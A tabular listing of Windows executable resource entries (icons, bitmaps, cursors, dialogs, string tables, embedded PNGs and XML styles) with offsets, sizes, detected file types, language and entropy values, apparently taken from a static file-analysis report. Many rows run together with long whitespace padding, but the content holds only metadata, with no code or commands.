PNG | 0x42a5d0 | 0xb07 | PNG image data, 5 x 5, 8-bit/color RGBA, non-interlaced | English | United States | 1.003896563939072
PNG | 0x429a80 | 0xb50 | PNG image data, 7 x 7, 8-bit/color RGBA, non-interlaced | English | United States | 1.0037983425414365
PNG | 0x4128f0 | 0x2885 | PNG image data, 42 x 348, 8-bit/color RGBA, non-interlaced | English | United States | 1.0010604453870626
PNG | 0x415178 | 0xd8e | PNG image data, 38 x 38, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031700288184437
PNG | 0x415f08 | 0x53b | PNG image data, 30 x 16, 8-bit/color RGBA, non-interlaced | English | United States | 1.0082150858849888
PNG | 0x4270e0 | 0x4f3 | PNG image data, 22 x 66, 8-bit/color RGBA, non-interlaced | English | United States | 1.0086819258089976
PNG | 0x41a758 | 0x130f | PNG image data, 22 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.0022545603607296
PNG | 0x41ba68 | 0xe74 | PNG image data, 10 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.002972972972973
PNG | 0x41e918 | 0x11ba | PNG image data, 22 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.002423975319524
PNG | 0x41fad8 | 0xece | PNG image data, 11 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0029023746701846
PNG | 0x41c8e0 | 0x11ba | PNG image data, 22 x 154, 8-bit/color RGBA, non-interlaced | English | United States | 1.002423975319524
PNG | 0x41daa0 | 0xe74 | PNG image data, 10 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.002972972972973
PNG | 0x407f28 | 0x1206 | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023840485478976
PNG | 0x40a260 | 0x11bc | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0024229074889868
PNG | 0x409130 | 0x112a | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025034137460174
PNG | 0x40b420 | 0x127a | PNG image data, 22 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023255813953489
PNG | 0x40efc0 | 0xd3e | PNG image data, 15 x 56, 8-bit/color RGBA, non-interlaced | English | United States | 1.003244837758112
PNG | 0x40fd00 | 0xbac | PNG image data, 32 x 8, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036813922356091
PNG | 0x411480 | 0x146a | PNG image data, 56 x 69, 8-bit/color RGBA, non-interlaced | English | United States | 1.0021048603138156
PNG | 0x416448 | 0x122f | PNG image data, 22 x 132, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023630504833512
PNG | 0x417678 | 0xdec | PNG image data, 11 x 110, 8-bit/color RGBA, non-interlaced | English | United States | 1.0030864197530864
PNG | 0x418468 | 0x1100 | PNG image data, 42 x 228, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025275735294117
PNG | 0x419568 | 0x11ed | PNG image data, 42 x 140, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023970363913706
PNG | 0x40d758 | 0x1864 | PNG image data, 42 x 330, 8-bit/color RGBA, non-interlaced | English | United States | 1.0003203074951954
PNG | 0x40c6a0 | 0x10b5 | PNG image data, 22 x 88, 8-bit/color RGBA, non-interlaced | English | United States | 1.0025718961889174
PNG | 0x4275d8 | 0x124b | PNG image data, 14 x 276, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023489216314327
PNG | 0x428828 | 0x1256 | PNG image data, 14 x 276, 8-bit/color RGBA, non-interlaced | English | United States | 1.0023434171282488
PNG | 0x4227f8 | 0xf2c | PNG image data, 15 x 80, 8-bit/color RGBA, non-interlaced | English | United States | 1.002832131822863
PNG | 0x421918 | 0xede | PNG image data, 15 x 76, 8-bit/color RGBA, non-interlaced | English | United States | 1.0028901734104045
PNG | 0x4209a8 | 0xf69 | PNG image data, 15 x 84, 8-bit/color RGBA, non-interlaced | English | United States | 1.0027883396704689
PNG | 0x423728 | 0xe20 | PNG image data, 22 x 44, 8-bit/color RGBA, non-interlaced | English | United States | 1.0030420353982301
PNG | 0x42b0d8 | 0xdc7 | PNG image data, 64 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031187978451943
PNG | 0x4002c0 | 0xbae | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036789297658864
PNG | 0x400e70 | 0xd91 | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.003167290526922
PNG | 0x401c08 | 0xb12 | PNG image data, 1 x 23, 8-bit/color RGBA, non-interlaced | English | United States | 1.003881439661256
PNG | 0x4371a8 | 0xbc3 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036532713384259
PNG | 0x436508 | 0xc9f | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.003404518724853
PNG | 0x435788 | 0xd7d | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031856356791196
PNG | 0x434b90 | 0xbf7 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0035912504080966
PNG | 0x433ef8 | 0xc96 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034140285536934
PNG | 0x433168 | 0xd8c | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031718569780854
PNG | 0x439790 | 0xbda | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036255767963085
PNG | 0x438af0 | 0xca0 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034034653465347
PNG | 0x437d70 | 0xd80 | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031828703703705
PNG | 0x42ff88 | 0xbe2 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036160420775806
PNG | 0x42f2f8 | 0xc8c | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034246575342465
PNG | 0x42e578 | 0xd7b | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031874818893074
PNG | 0x42d990 | 0xbe7 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036101083032491
PNG | 0x42ccf8 | 0xc94 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034161490683229
PNG | 0x42bf78 | 0xd80 | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031828703703705
PNG | 0x42bea0 | 0xd4 | PNG image data, 3 x 26, 8-bit/color RGBA, non-interlaced | English | United States | 1.028301886792453
PNG | 0x43bd88 | 0xbd0 | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.003637566137566
PNG | 0x43b0f0 | 0xc97 | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.0034129692832765
PNG | 0x43a370 | 0xd7a | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031884057971014
PNG | 0x432588 | 0xbda | PNG image data, 3 x 92, 8-bit/color RGBA, non-interlaced | English | United States | 1.0036255767963085
PNG | 0x4318f8 | 0xc8f | PNG image data, 80 x 19, 8-bit/color RGBA, non-interlaced | English | United States | 1.003421461897356
PNG | 0x430b70 | 0xd86 | PNG image data, 13 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0031773541305604
PNG | 0x402720 | 0x1908 | PNG image data, 50 x 178, 8-bit/color RGBA, non-interlaced | English | United States | 0.9887640449438202
PNG | 0x404028 | 0xb75 | PNG image data, 3 x 61, 8-bit/color RGBA, non-interlaced | English | United States | 1.0037504261847938
PNG | 0x4108b0 | 0xbd0 | PNG image data, 9 x 51, 8-bit/color RGBA, non-interlaced | English | United States | 1.003637566137566
PNG | 0x425b70 | 0x1570 | PNG image data, 18 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0020043731778425
PNG | 0x424548 | 0x1623 | PNG image data, 18 x 72, 8-bit/color RGBA, non-interlaced | English | United States | 1.0019410622904534
STYLE_XML | 0x330840 | 0x4e01 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.1839851770243878
STYLE_XML | 0x363000 | 0x4b09 | HTML document, ASCII text, with CRLF line terminators | English | United States | 0.20396689052006872
                                                                                                                                                                                                                                                                                                                                                                                        STYLE_XML0x3972a80x4aa6HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20460491889063318
                                                                                                                                                                                                                                                                                                                                                                                        STYLE_XML0x3c8a700x4a18HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.20397511598481655
                                                                                                                                                                                                                                                                                                                                                                                        STYLE_XML0x3fdb900x1955HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.1918272937548188
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f0a80x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4805194805194805
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f1e00xb4Targa image data - Map 32 x 65536 x 1 +16 "\001"EnglishUnited States0.7
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f2c00x134AmigaOS bitmap font "(", fc_YSize 4294967264, 5120 elements, 2nd "\377\360?\377\377\370\177\377\377\374\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.36363636363636365
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f4100x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.35714285714285715
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f5600x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f6b00x134dataEnglishUnited States0.37662337662337664
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f8000x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32f9500x134Targa image data 64 x 65536 x 1 +32 "\001"EnglishUnited States0.37662337662337664
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32faa00x134Targa image data - Mono - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.36688311688311687
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32fbf00x134Targa image data - RGB - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32fd400x134dataEnglishUnited States0.44155844155844154
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32fe900x134dataEnglishUnited States0.4155844155844156
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x32ffe00x134AmigaOS bitmap font "(", fc_YSize 4294966847, 3840 elements, 2nd "\377?\374\377\377\300\003\377\377\300\003\377\377\340\007\377\377\360\017\377\377\370\037\377\377\374?\377\377\376\177\377\377\377\377\377\377\377\377\377\377\377\377\377", 3rdEnglishUnited States0.5422077922077922
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x3301300x134dataEnglishUnited States0.2662337662337662
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x3302800x134dataEnglishUnited States0.2824675324675325
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x3303d00x134dataEnglishUnited States0.3246753246753247
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x465c700x134dataEnglishUnited States0.20454545454545456
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x465dc00x134dataEnglishUnited States0.2857142857142857
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x465f100x134dataEnglishUnited States0.4675324675324675
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4660600x134dataEnglishUnited States0.2532467532467532
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4661b00x134Targa image data - RLE 64 x 65536 x 1 +32 "\001"EnglishUnited States0.40584415584415584
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4663000x134dataEnglishUnited States0.4383116883116883
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4664500x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4665a00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.39285714285714285
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4666f00x134Targa image data - Mono 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4512987012987013
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4668400x134dataEnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x4669900x134dataEnglishUnited States0.4448051948051948
                                                                                                                                                                                                                                                                                                                                                                                        RT_CURSOR0x466ae00x134dataEnglishUnited States0.525974025974026
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x43f3b00x62cDevice independent bitmap graphic, 324 x 9 x 4, image size 1476EnglishUnited States0.2430379746835443
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x43f2c80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 128EnglishUnited States0.5818965517241379
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x43f9e00x4a0Device independent bitmap graphic, 144 x 15 x 4, image size 1080EnglishUnited States0.3783783783783784
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x43fe800x197aDevice independent bitmap graphic, 144 x 15 x 24, image size 6482, resolution 2834 x 2834 px/mEnglishUnited States0.380098129408157
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4418000xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.51
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x441ad80xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.515
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x441db00xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.43
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4420880xc8Device independent bitmap graphic, 13 x 12 x 4, image size 96EnglishUnited States0.44
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4427c80x182aDevice independent bitmap graphic, 128 x 16 x 24, image size 6146, resolution 2834 x 2834 px/mEnglishUnited States0.2924345295829292
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4423600x468Device independent bitmap graphic, 128 x 16 x 4, image size 1024EnglishUnited States0.3058510638297872
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x443ff80x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4803030303030303
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4448500x528Device independent bitmap graphic, 16 x 16 x 8, image size 256EnglishUnited States0.4765151515151515
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4450a80x158Device independent bitmap graphic, 32 x 15 x 4, image size 240EnglishUnited States0.41569767441860467
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4452000x188Device independent bitmap graphic, 48 x 12 x 4, image size 288EnglishUnited States0.39285714285714285
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x445fb80x1e8Device independent bitmap graphic, 48 x 16 x 4, image size 384EnglishUnited States0.5081967213114754
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x446ac80xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.18736462093862816
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4475a00xad2Device independent bitmap graphic, 29 x 31 x 24, image size 2730, resolution 2834 x 2834 px/mEnglishUnited States0.1844765342960289
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4480780xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.19497523000707714
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x448b880x7e2Device independent bitmap graphic, 25 x 26 x 24, image size 1978, resolution 2834 x 2834 px/mEnglishUnited States0.24033696729435083
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4493700xb0aDevice independent bitmap graphic, 31 x 29 x 24, image size 2786, resolution 2834 x 2834 px/mEnglishUnited States0.1935598018400566
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x449e800x134Device independent bitmap graphic, 17 x 17 x 4, image size 204EnglishUnited States0.37337662337662336
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4461a00x928Device independent bitmap graphic, 48 x 16 x 24, image size 0, resolution 2834 x 2834 px/mEnglishUnited States0.533703071672355
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4445200x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.7518518518518519
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x444d780x32aDevice independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/mEnglishUnited States0.3790123456790123
                                                                                                                                                                                                                                                                                                                                                                                        RT_BITMAP0x4453880xc2aDevice independent bitmap graphic, 64 x 16 x 24, image size 3074, resolution 2834 x 2834 px/mEnglishUnited States0.42485549132947975
RT_BITMAP | 0x4418c8 | 0x20a | Device independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/m | English | United States | 0.9367816091954023
RT_BITMAP | 0x441ba0 | 0x20a | Device independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/m | English | United States | 0.4482758620689655
RT_BITMAP | 0x441e78 | 0x20a | Device independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/m | English | United States | 0.33524904214559387
RT_BITMAP | 0x442150 | 0x20a | Device independent bitmap graphic, 13 x 12 x 24, image size 482, resolution 2834 x 2834 px/m | English | United States | 0.3371647509578544
RT_BITMAP | 0x449fb8 | 0x32a | Device independent bitmap graphic, 16 x 16 x 24, image size 770, resolution 2834 x 2834 px/m | English | United States | 0.6320987654320988
RT_BITMAP | 0x44a2e8 | 0x2256 | Device independent bitmap graphic, 324 x 9 x 24, image size 8750, resolution 2834 x 2834 px/m | English | United States | 0.0608646188850967
RT_BITMAP | 0x44c540 | 0x602a | Device independent bitmap graphic, 192 x 32 x 32, image size 24578, resolution 2834 x 2834 px/m | English | United States | 0.2250385896498497
RT_BITMAP | 0x452570 | 0x2028 | Device independent bitmap graphic, 128 x 16 x 32, image size 0 | English | United States | 0.24708454810495628
RT_BITMAP | 0x454598 | 0x13da | Device independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.11570247933884298
RT_BITMAP | 0x455978 | 0x13da | Device independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.10999606454151908
RT_BITMAP | 0x456d58 | 0x13da | Device independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.11511216056670602
RT_BITMAP | 0x458138 | 0xeb2 | Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/m | English | United States | 0.13157894736842105
RT_BITMAP | 0x458ff0 | 0x13da | Device independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.11983471074380166
RT_BITMAP | 0x45a3d0 | 0x13da | Device independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.27371113734750097
RT_BITMAP | 0x45b7b0 | 0x13da | Device independent bitmap graphic, 35 x 36 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.2699724517906336
RT_BITMAP | 0x45cb90 | 0x13da | Device independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.2426210153482881
RT_BITMAP | 0x45df70 | 0xeb2 | Device independent bitmap graphic, 31 x 30 x 32, image size 3722, resolution 2834 x 2834 px/m | English | United States | 0.3413078149920255
RT_BITMAP | 0x45ee28 | 0x13da | Device independent bitmap graphic, 36 x 35 x 32, image size 5042, resolution 2834 x 2834 px/m | English | United States | 0.23868555686737505
RT_BITMAP | 0x460208 | 0x5a66 | Device independent bitmap graphic, 77 x 75 x 32, image size 23102, resolution 2834 x 2834 px/m | English | United States | 0.046365914786967416
RT_BITMAP | 0x330640 | 0xb8 | Device independent bitmap graphic, 12 x 10 x 4, image size 80 | English | United States | 0.44565217391304346
RT_BITMAP | 0x3306f8 | 0x144 | Device independent bitmap graphic, 33 x 11 x 4, image size 220 | English | United States | 0.37962962962962965
RT_ICON | 0x2f54f0 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.40053763440860213
RT_ICON | 0x2f57d8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.5202702702702703
RT_ICON | 0x466c68 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.33198924731182794
RT_ICON | 0x466f50 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.41216216216216217
RT_ICON | 0x4670a0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.42905405405405406
RT_ICON | 0x4671c8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | English | United States | 0.2661290322580645
RT_ICON | 0x4674d8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.18010752688172044
RT_ICON | 0x4677c0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | United States | 0.35135135135135137
RT_ICON | 0x4678e8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.06092057761732852
RT_ICON | 0x468190 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.07658959537572255
RT_ICON | 0x4686f8 | 0xca8 | Device independent bitmap graphic, 32 x 64 x 24, image size 3072 | English | United States | 0.042901234567901236
RT_ICON | 0x4693a0 | 0x368 | Device independent bitmap graphic, 16 x 32 x 24, image size 768 | English | United States | 0.10550458715596331
RT_ICON | 0x469768 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | United States | 0.6400709219858156
RT_ICON | 0x469bd0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | United States | 0.5
RT_MENU | 0x469d20 | 0x11c | data | English | United States | 0.573943661971831
RT_DIALOG | 0x32ed28 | 0x80 | data | English | United States | 0.7265625
RT_DIALOG | 0x43d048 | 0x13c | data | English | United States | 0.5949367088607594
RT_DIALOG | 0x43d188 | 0x1a4 | data | English | United States | 0.5380952380952381
RT_DIALOG | 0x43c9b0 | 0xe6 | data | English | United States | 0.6347826086956522
RT_DIALOG | 0x43ca98 | 0x390 | data | English | United States | 0.4418859649122807
RT_DIALOG | 0x43ce28 | 0x21c | data | English | United States | 0.5037037037037037
RT_DIALOG | 0x43d330 | 0x390 | data | English | United States | 0.4692982456140351
RT_DIALOG | 0x43d6c0 | 0x1dc | data | English | United States | 0.5441176470588235
RT_DIALOG | 0x43d8a0 | 0x346 | data | English | United States | 0.46897374701670647
RT_DIALOG | 0x43dbe8 | 0x334 | data | English | United States | 0.43658536585365854
RT_DIALOG | 0x43c958 | 0x58 | data | English | United States | 0.8068181818181818
RT_DIALOG | 0x43df20 | 0x23c | data | English | United States | 0.5122377622377622
RT_DIALOG | 0x43e8f0 | 0x1c2 | data | English | United States | 0.5066666666666667
RT_DIALOG | 0x43e160 | 0x160 | data | English | United States | 0.5994318181818182
RT_DIALOG | 0x43e2c0 | 0xb2 | data | English | United States | 0.7191011235955056
RT_DIALOG | 0x43e378 | 0x3d4 | data | English | United States | 0.3408163265306122
RT_DIALOG | 0x43e750 | 0x19e | data | English | United States | 0.6280193236714976
RT_DIALOG | 0x43eab8 | 0x1a2 | data | English | United States | 0.5741626794258373
RT_DIALOG | 0x43ec60 | 0x34 | data | English | United States | 0.8076923076923077
RT_DIALOG | 0x43ec98 | 0x2a8 | data | English | United States | 0.5338235294117647
RT_DIALOG | 0x43ef40 | 0x382 | data | English | United States | 0.48552338530066813
RT_DIALOG | 0x330520 | 0xe8 | data | English | United States | 0.6336206896551724
RT_DIALOG | 0x330608 | 0x34 | data | English | United States | 0.9038461538461539
RT_STRING | 0x469e40 | 0x1f6 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.44223107569721115
RT_STRING | 0x46a038 | 0x3e | data | English | United States | 0.7096774193548387
RT_STRING | 0x46a078 | 0x60 | data | English | United States | 0.8125
RT_STRING | 0x46a0d8 | 0x76 | data | English | United States | 0.8983050847457628
RT_STRING | 0x46a150 | 0xb6 | AmigaOS bitmap font "(W\211[\335\210E\232\325R\013z\017_/", 25451 elements, 2nd, 3rd | English | United States | 0.8791208791208791
RT_STRING | 0x46a208 | 0x110 | data | English | United States | 0.7794117647058824
RT_STRING | 0x46a318 | 0x216 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.46441947565543074
RT_STRING | 0x46a530 | 0x42 | data | English | United States | 0.6818181818181818
RT_STRING | 0x46a578 | 0x116 | data | English | United States | 0.5323741007194245
RT_STRING | 0x46a690 | 0x14a | data | English | United States | 0.5545454545454546
RT_STRING | 0x46c2b8 | 0x32c | data | English | United States | 0.4125615763546798
RT_STRING | 0x46c5e8 | 0x248 | data | English | United States | 0.5085616438356164
RT_STRING | 0x46d2e0 | 0x84 | data | English | United States | 0.5833333333333334
RT_STRING | 0x46c830 | 0x2a8 | data | English | United States | 0.36176470588235293
RT_STRING | 0x46cad8 | 0x20e | data | English | United States | 0.3155893536121673
RT_STRING | 0x46cce8 | 0x24c | data | English | United States | 0.4370748299319728
RT_STRING | 0x46d368 | 0x3c | data | English | United States | 0.65
RT_STRING | 0x46cf38 | 0x16e | data | English | United States | 0.39344262295081966
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d0a80xa6Matlab v4 mat-file (little endian) T, numeric, rows 0, columns 0EnglishUnited States0.7228915662650602
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d3a80x184dataEnglishUnited States0.4742268041237113
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d5300x66dataEnglishUnited States0.696078431372549
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d7d80x1d6Matlab v4 mat-file (little endian) S, numeric, rows 0, columns 0EnglishUnited States0.35319148936170214
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d5980x186dataEnglishUnited States0.5384615384615384
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d7200xb2dataEnglishUnited States0.6179775280898876
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d9b00x48Matlab v4 mat-file (little endian) a, numeric, rows 0, columns 0EnglishUnited States0.7083333333333334
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46d1500x18cdataEnglishUnited States0.398989898989899
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a7e00x82StarOffice Gallery theme p, 536899072 objects, 1st nEnglishUnited States0.7153846153846154
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a8680x2adataEnglishUnited States0.5476190476190477
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46a8980x184dataEnglishUnited States0.48711340206185566
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46aa200x4eedataEnglishUnited States0.375594294770206
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46b2a00x264dataEnglishUnited States0.3333333333333333
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46afc00x2dadataEnglishUnited States0.3698630136986301
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46bce80x8adataEnglishUnited States0.6594202898550725
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46af100xacdataEnglishUnited States0.45348837209302323
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46bbd80xdedataEnglishUnited States0.536036036036036
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46b5080x4a8dataEnglishUnited States0.3221476510067114
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46b9b00x228dataEnglishUnited States0.4003623188405797
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46bcb80x2cdataEnglishUnited States0.5227272727272727
                                                                                                                                                                                                                                                                                                                                                                                        RT_STRING0x46bd780x53edataEnglishUnited States0.2965722801788376
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4668280x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x4665880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x465da80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                                                                                                                                                                                                        RT_GROUP_CURSOR0x465ef80x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
